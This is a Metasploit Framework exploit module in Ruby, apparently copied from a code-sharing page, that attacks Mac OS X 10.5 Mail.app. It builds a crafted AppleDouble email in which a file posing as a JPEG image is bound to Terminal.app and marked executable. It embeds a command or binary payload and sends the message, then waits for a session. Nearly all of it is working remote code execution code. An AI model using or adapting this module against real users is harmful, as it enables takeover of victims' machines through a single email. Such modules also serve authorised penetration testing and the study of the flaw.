扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 | ## # $Id: mailapp_image_exec.rb 10397 2010-09-20 15:59:46Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # # This module sends email messages via smtp # include Msf::Exploit::Remote::SMTPDeliver include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Mail.app Image Attachment Command Execution', 'Description'=> %q{ This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5. }, 'License'=> MSF_LICENSE, 'Author' =>['hdm', 'kf'], 'Version'=> '$Revision: 10397 $', 'References' => [ ['CVE', '2006-0395'], ['CVE', '2007-6165'], ['OSVDB', '40875'], ['BID', '26510'], ['BID', '16907'] ], 'Stance' => Msf::Exploit::Stance::Passive, 'Payload'=> { 'Space' => 8192, 'DisableNops' => true, 'BadChars'=> "", 'Compat'=> { 'ConnectionType' => '-bind -find', }, }, 'Targets'=> [ [ 'Mail.app - Command Payloads', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'PayloadCompat' => { 'RequiredCmd'=> 'generic perl ruby bash telnet', } } ], [ 'Mail.app - Binary Payloads (x86)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Mail.app - Binary Payloads (ppc)', { 'Platform' => 'osx', 'Arch' => ARCH_PPC, } ], ], 'DisclosureDate' => 'Mar 01 2006' )) end def autofilter false end def exploit exts = ['jpg'] gext = exts[rand(exts.length)] name = rand_text_alpha(5) + ".#{gext}" data = rand_text_alpha(rand(32)+1) msg = Rex::MIME::Message.new msg.mime_defaults msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] dbl = Rex::MIME::Message.new dbl.header.set("Content-Type", "multipart/appledouble;\r\nboundary=#{dbl.bound}") dbl.header.set("Content-Disposition", "inline") # AppleDouble file version 2 # 3 entries - 'Finder Info', 'Real name', 'Resource Fork' # Real Name matches msf random generated 5 character name - (I cheated ala gsub) resfork = "AAUWBwACAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAJAAAAPgAAAAoAAAADAAAASAAAAAkAAAACAAAA\r\n" + "UQAABToAAAAAAAAAAAAASGVpc2UuanBnAAABAAAABQgAAAQIAAAAMgAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQA\r\n" + "AAAlL0FwcGxpY2F0aW9ucy9VdGlsaXRpZXMvVGVybWluYWwuYXBwAOzs7P/s7Oz/7Ozs/+zs7P/s\r\n" + "7Oz/7Ozs/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/4eHh/+Hh4f/h4eH/5ubm/+bm5v/m5ub/5ubm/+bm\r\n" + "5v/m5ub/5ubm/+bm5v/p6en/6enp/+np6f/p6en/6enp/+np6f/p6en/6enp/+zs7P/s7Oz/7Ozs\r\n" + "/+zs7P/s7Oz/7Ozs/+zs7P/s7Oz/7+/v/+/v7//v7+//7+/v/+/v7//v7+//7+/v/+/v7//z8/P/\r\n" + "8/Pz//Pz8//z8/P/8/Pz//Pz8//z8/P/8/Pz//b29v/29vb/9vb2//b29v/29vb/9vb2//b29v/2\r\n" + "9vb/+Pj4//j4+P/4+Pj/+Pj4//j4+P/4+Pj/+Pj4//j4+P/8/Pz//Pz8//z8/P/8/Pz//Pz8//z8\r\n" + "/P/8/Pz//Pz8////////////////////////////////////////////////////////////////\r\n" + "/////////////////////6gAAACoAAAAqAAAAKgAAACoAAAAqAAAAKgAAACoAAAAKgAAACoAAAAq\r\n" + "AAAAKgAAACoAAAAqAAAAKgAAACoAAAADAAAAAwAAAAMAAAADAAAAAwAAAAMAAAADAAAAAwAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" + "AAAAAQAAAAUIAAAECAAAADIAX9CsEsIAAAAcADIAAHVzcm8AAAAKAAD//wAAAAABDSF8" + "\r\n" fork = Rex::Text.encode_base64( Rex::Text.decode_base64(resfork).gsub("Heise.jpg",name), "\r\n" ) cid = "<#{rand_text_alpha(rand(16)+16)}@#{rand_text_alpha(rand(16)+1)}.com>" cmd = '' if (target.arch.include?(ARCH_CMD)) cmd = Rex::Text.encode_base64(payload.encoded, "\r\n") else bin = generate_payload_exe cmd = Rex::Text.encode_base64(bin, "\r\n") end dbl.add_part(fork , "application/applefile;\r\nname=\"#{name}\"", "base64", "inline;\r\nfilename=#{name}" ) dbl.add_part(cmd , "image/jpeg;\r\nx-mac-type=0;\r\nx-unix-mode=0755;\r\nx-mac-creator=0;\r\nname=\"#{name}\"", "base64\r\nContent-Id: #{cid}", "inline;\r\nfilename=#{name}" ) msg.parts << dbl send_message(msg.to_s) print_status("Waiting for a payload session (backgrounding)...") end end |
体验盒子
